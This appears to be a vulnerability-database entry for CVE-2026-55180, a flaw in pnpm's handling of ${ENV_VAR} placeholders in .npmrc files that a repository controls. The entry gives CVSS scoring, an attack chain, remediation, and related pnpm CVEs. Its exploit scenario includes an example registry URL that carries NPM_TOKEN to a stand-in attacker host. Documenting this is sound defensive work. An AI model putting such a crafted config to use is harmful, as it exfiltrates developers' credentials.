
pnpm EUVD-2026-39498 | CVE-2026-55180 MEDIUM
Information Exposure (CWE-200)
2026-06-25 GitHub_M GHSA-3qhv-2rgh-x77r
CVSS 3.1 score 6.5 · Vendor: GitHub_M

Severity by source

Vendor (GitHub_M) PRIMARY
6.5 MEDIUM
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
vuln.today AI
6.5 MEDIUM

AV:N as the malicious repo is network-delivered; PR:N since attacker owns the repo not the victim system; UI:R for required clone-and-run; C:H for high-value secret exfiltration; no integrity or availability impact.

CVSS 3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CVSS 4.0: AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS Vector (Vendor: GitHub_M)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Lifecycle Timeline

Patch available: Jun 25, 2026 - 19:17 (EUVD)
Analysis generated: Jun 25, 2026 - 18:25 (vuln.today)

Description (CVE.org)

pnpm is a package manager. Prior to 10.34.2 and 11.5.3, pnpm and pacquet expanded ${ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml into registry request destinations and registry credentials. A malicious repository could cause dependency resolution to send victim environment secrets to an attacker-selected registry before lifecycle scripts run. This vulnerability is fixed in 10.34.2 and 11.5.3.

Analysis (AI)

… ${ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml files into registry request URLs and credentials. When a developer clones and runs pnpm install in a crafted repository, the package manager resolves dependency requests against attacker-controlled registry endpoints, transmitting whatever environment variables (tokens, API keys, credentials) the victim has set in their shell. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Attacker crafts malicious .npmrc with ${ENV_VAR} in registry URL
Delivery: Victim clones attacker-controlled repository
Exploit: Victim runs pnpm install in repository directory
Execution: pnpm expands environment variables into registry destination
Persist: Outbound HTTP request carries secret to attacker server
Impact: Attacker captures credential from server logs

Vulnerability Assessment (AI)

Exploitation: The victim must clone a repository controlled or influenced by the attacker and then invoke pnpm dependency resolution (e.g., pnpm install, pnpm fetch, or equivalent) within that repository directory. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment: The CVSS 3.1 score of 6.5 with vector AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N accurately reflects the threat profile: network-delivered, low complexity, no attacker privileges needed, but requiring user interaction (UI:R). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario: An attacker publishes or contributes to a repository containing a crafted .npmrc or pnpm-workspace.yaml that sets the registry URL to https://attacker.example.com/${NPM_TOKEN}/ or similar. When a victim developer clones the repository and runs pnpm install (a routine step in onboarding, CI pipelines, or reviewing pull requests), pnpm expands the environment variable, transmits the token value to the attacker's server in the outbound HTTP request path, and the attacker captures it from their server logs. …
Remediation: Upgrade pnpm to version 10.34.2 or later on the 10.x release line, or to 11.5.3 or later on the 11.x release line; these are the vendor-confirmed fixed versions per the GitHub Security Advisory GHSA-3qhv-2rgh-x77r at https://github.com/pnpm/pnpm/security/advisories/GHSA-3qhv-2rgh-x77r. … Detailed patch versions, workarounds, and compensating controls in full report.


More in pnpm
CVE-2025-69264 CRITICAL POC
9.8 Jan 07

Arbitrary code execution in the pnpm package manager (versions 10.0.0 through 10.25) lets a git-hosted dependency run co

CVE-2026-50016 HIGH POC
8.8 Jun 25

Path traversal in pnpm before 10.34.0 and 11.4.0 lets a malicious registry package smuggle '../' segments inside a trans

CVE-2026-55698 HIGH POC
8.8 Jun 25

Arbitrary code execution in the pnpm package manager (versions prior to 10.34.2 and 11.5.3) lets a malicious repository

CVE-2026-55697 HIGH POC
8.8 Jun 25

Arbitrary command execution in pnpm before 10.34.2 and 11.5.3 allows a malicious repository to run attacker-chosen nativ

CVE-2025-69263 HIGH POC
8.8 Jan 07

Supply-chain integrity bypass in pnpm package manager (versions ≤10.26.2, per description; GHSA states <10.26.0) allows

CVE-2026-50021 HIGH POC
8.1 Jun 25

Integrity-check bypass in the pnpm package manager (versions before 10.34.0/10.34.1 and 11.0.0-11.3.x) lets tampered pac

CVE-2025-69262 HIGH POC
7.8 Jan 07

{VAR} substitution inside .npmrc tokenHelper settings combined with spawnSync invoked with shell: true. The bug primaril

CVE-2026-50015 HIGH POC
7.3 Jun 25

Arbitrary file write and deletion in pnpm package manager (versions prior to 10.34.0 and 11.4.0) lets a malicious contri

CVE-2026-50014 HIGH POC
7.3 Jun 25

Arbitrary command execution in pnpm before 10.34.0 and 11.4.0 allows a malicious lockfile to run code on a developer's m

CVE-2026-55700 HIGH POC
7.1 Jun 25

Path traversal in pnpm's `pnpm stage download` command (versions 11.3.0 through 11.5.2) lets a malicious or compromised

CVE-2026-55699 MEDIUM POC
6.5 Jun 25

Path traversal in pnpm's global package management flows allows deletion of the global bin directory or its parent when

CVE-2024-47829 MEDIUM POC
6.5 Apr 23

pnpm is a package manager. Rated medium severity (CVSS 6.5), this vulnerability is remotely exploitable, no authenticati


EUVD-2026-39498 vulnerability details – vuln.today
